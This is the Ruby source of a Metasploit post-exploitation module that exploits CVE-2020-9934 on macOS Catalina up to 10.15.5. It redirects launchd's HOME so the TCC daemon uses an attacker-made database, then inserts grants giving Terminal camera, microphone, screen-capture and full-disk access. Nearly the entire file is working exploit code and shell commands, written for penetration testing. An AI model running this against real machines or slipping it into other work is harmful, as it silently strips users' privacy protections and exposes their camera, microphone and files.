GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/post/osx/escalate/tccbypass.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
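class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::OSX::Priv
  include Msf::Post::OSX::System

  # TCC services granted to TERMINAL_BUNDLE in the attacker-controlled database.
  # Each name is inserted verbatim as the `service` column of the `access` table.
  TCC_SERVICES = %w[
    kTCCServiceCamera kTCCServiceMicrophone kTCCServiceAll kTCCServiceScreenCapture
    kTCCServiceSystemPolicyDocumentsFolder kTCCService kTCCServiceSystemPolicyDeveloperFiles
    kTCCServiceSystemPolicyDesktopFolder kTCCServiceSystemPolicyAllFiles
    kTCCServiceSystemPolicyNetworkVolumes kTCCServiceSystemPolicySysAdminFiles
    kTCCServiceSystemPolicyDownloadsFolder
  ].freeze

  # Bundle identifier that receives the grants (Terminal.app).
  TERMINAL_BUNDLE = 'com.apple.Terminal'.freeze

  # Code-signing requirement blob stored with each grant. The hex contains the
  # ASCII string "com.apple.Terminal", so it presumably pins the grant to that
  # bundle identifier — not decoded here, taken from the original PoC.
  TERMINAL_CSREQ = 'fade0c000000003000000001000000060000000200000012636f6d2e6170706c652e5465726d696e616c000000000003'.freeze

  # Command that reverts launchd's HOME and restarts the user tccd. Once HOME is
  # restored, tccd presumably goes back to the real TCC.db, so this also drops
  # every grant made by this module.
  RESTORE_TCCD_CMD = 'launchctl unsetenv HOME && launchctl stop com.apple.tccd && launchctl start com.apple.tccd'.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Bypass the macOS TCC Framework',
        'Description' => %q{
          This module exploits a vulnerability in the TCC daemon on macOS Catalina
          (<= 10.15.5) in order to grant TCC entitlements. The TCC daemon can be
          manipulated (by setting the HOME environment variable) to use a new user
          controlled location as the TCC database. We can then grant ourselves
          entitlements by inserting them into this new database.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'mattshockl', # discovery
          'timwr', # metasploit module
        ],
        'References' => [
          ['CVE', '2020-9934'],
          ['URL', 'https://medium.com/@mattshockl/cve-2020-9934-bypassing-the-os-x-transparency-consent-and-control-tcc-framework-for-4e14806f1de8'],
          ['URL', 'https://github.com/mattshockl/CVE-2020-9934'],
        ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          # CONFIG_CHANGES: launchd's HOME is redirected for the whole user domain
          # and intentionally left that way on success (see cleanup_command).
          'SideEffects' => [ CONFIG_CHANGES, ARTIFACTS_ON_DISK, SCREEN_EFFECTS ],
          'Reliability' => []
        },
        'Platform' => [ 'osx' ],
        'SessionTypes' => [ 'shell', 'meterpreter' ]
      )
    )
    register_advanced_options([
      OptString.new('WritableDir', [true, 'Writable directory', '/tmp'])
    ])
  end

  # Version-based check only: Appears for Catalina before 10.15.6 (the fixed
  # release), Safe for 10.15.6 and later, Unknown when the version cannot be read
  # or predates Catalina (pre-10.15 builds are not tested by this module).
  def check
    system_version = get_system_version
    return Exploit::CheckCode::Unknown unless system_version

    version = Rex::Version.new(system_version)
    return Exploit::CheckCode::Safe if version >= Rex::Version.new('10.15.6')
    return Exploit::CheckCode::Unknown if version < Rex::Version.new('10.15.0')

    Exploit::CheckCode::Appears
  end

  # Redirects tccd to a fresh database under WritableDir, inserts the grants and
  # prints the manual cleanup steps. Cleanup is deliberately not automatic on
  # success because it would revoke the grants just made; it IS performed when
  # tccd did not create the fake database, so a failed run does not leave
  # launchd's HOME pointing at a temp directory.
  def run
    fail_with(Failure::NotVulnerable, 'Target is not vulnerable') unless check == Exploit::CheckCode::Appears

    writable_dir = datastore['WritableDir']
    fail_with(Failure::BadConfig, "#{writable_dir} is not writable") unless writable?(writable_dir)
    # sqlite3 populates the database; check before HOME has been redirected.
    fail_with(Failure::NotFound, 'sqlite3 not found on target') unless command_exists?('sqlite3')

    tmpdir = "#{writable_dir}/.#{Rex::Text.rand_text_alpha(8)}"
    tccdir = "#{tmpdir}/Library/Application Support/com.apple.TCC"
    tccdb = "#{tccdir}/TCC.db"

    redirect_tccd_home(tmpdir, tccdir)
    unless file_exist?(tccdb)
      print_error("No fake TCC DB found: #{tccdb}")
      restore_tccd_home(tmpdir)
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')
    end
    print_good("fake TCC DB found: #{tccdb}")

    failed = grant_entitlements(tccdb)
    if failed.empty?
      print_good('TCC.db was successfully updated!')
    else
      print_warning("TCC.db updated, but #{failed.length} insert(s) failed: #{failed.join(', ')}")
    end

    print_status("To cleanup, run:\n#{cleanup_command(tmpdir)}\n")
  end

  private

  # Point launchd's HOME at +tmpdir+ and restart the user tccd so that it
  # creates a new TCC.db under +tccdir+ — the behaviour CVE-2020-9934 relies on.
  def redirect_tccd_home(tmpdir, tccdir)
    print_status("Creating TCC directory #{tccdir}")
    cmd_exec("mkdir -p '#{tccdir}'")
    cmd_exec("launchctl setenv HOME '#{tmpdir}'")
    cmd_exec('launchctl stop com.apple.tccd && launchctl start com.apple.tccd')
  end

  # Revert HOME, restart tccd and remove the temp directory. Only used on the
  # failure path (no database was created, so nothing is lost by reverting).
  def restore_tccd_home(tmpdir)
    print_status('Restoring launchd HOME and removing temp directory')
    cmd_exec(RESTORE_TCCD_CMD)
    cmd_exec("rm -rf '#{tmpdir}'")
  end

  # Insert one `access` row per TCC_SERVICES entry into +tccdb+, granting it to
  # TERMINAL_BUNDLE for one year. The column list matches the Catalina schema
  # this module targets. sqlite3 prints nothing on a successful INSERT, so any
  # output (stderr is merged in) is treated as a failure for that service.
  # Returns the array of service names whose insert produced output.
  def grant_entitlements(tccdb)
    expiry = 1.year.from_now.to_i
    TCC_SERVICES.each_with_object([]) do |service, failed|
      sql_insert = "INSERT INTO access VALUES('#{service}', '#{TERMINAL_BUNDLE}', 0, 1, 1, X'#{TERMINAL_CSREQ}', NULL, NULL, 'UNUSED', NULL, NULL, #{expiry});"
      output = cmd_exec("sqlite3 '#{tccdb}' \"#{sql_insert}\" 2>&1")
      next if output.nil? || output.empty?

      print_error("sqlite3 output for #{service}: #{output}")
      failed << service
    end
  end

  # Shell commands the operator must run to undo the module: revert HOME,
  # restart tccd and delete +tmpdir+ (which holds the fake TCC.db).
  def cleanup_command(tmpdir)
    "#{RESTORE_TCCD_CMD}\nrm -rf '#{tmpdir}'"
  end
end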